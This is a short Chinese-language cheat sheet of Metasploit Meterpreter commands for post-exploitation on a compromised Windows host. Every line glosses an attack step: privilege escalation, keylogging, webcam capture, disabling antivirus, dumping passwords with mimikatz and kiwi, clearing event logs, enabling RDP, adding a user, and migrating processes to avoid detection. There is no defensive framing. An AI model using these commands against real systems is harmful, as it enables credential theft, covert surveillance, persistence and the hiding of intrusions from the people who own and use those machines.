Meterpreter命令
Meterpreter Shell命令
getsystem #会自动利用各种各样的系统漏洞来进行权限提升;
migrate #进程id进程迁移;
getuid #查看对方正在运行的用户;
ps #列出所有的进程;
getpid #返回运行meterpreter的id号;
sysinfo #产看系统信息和体系结构;
shell #切换到cmd的系统权限方式;
exit #退出shell会话返回meterpreter或终止;
getdesktop #截取目标主机当前桌面会话窗口;
cd #切换目标目录;
cat #读取文件内容;
del #删除文件;
edit #使用vim编辑文件;
ls #获取当前目录下的文件;
mkdir #新建目录;
rmdir #删除目录;
download #命令可以帮助我们从目标系统中下载文件
upload #命令则能够向目标系统上传文件
execute -f
-H:创建一个隐藏进程
-a:传递给命令的参数
-i:跟进程进行交互
-m:从内存中执行
-t:使用当前伪造的线程令牌运行进程
-s:在给定会话中执行进程
Screenshot 进行屏幕截图并存储在我们的系统之中
keyscan_start:开启键盘记录功能
keyscan_dump:显示捕捉到的键盘记录信息
keyscan_stop:停止键盘记录功能
Getpid 需要绑定的进程
Migrate (pid) 绑定进程
webcam_snap:通过远程连接目标系统的摄像头
run killav:关闭杀软
load mimikatz 加载法国神器
Wdigest 读取用户密码
Load kiwi 加载kiwi插件
creds_all 查看用户密码
background 会话挂起
Clearev 清除事件日志
List_tokens -u 查看域
run getuid -e 打开远程
**run post/windows/manage/enable_rdp ** 打开远程
run getuid -u 用户名 -p 密码 创建新用户
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
run post/windows/manage/migrate 将当前进程移动到其它指定进程中,躲避杀软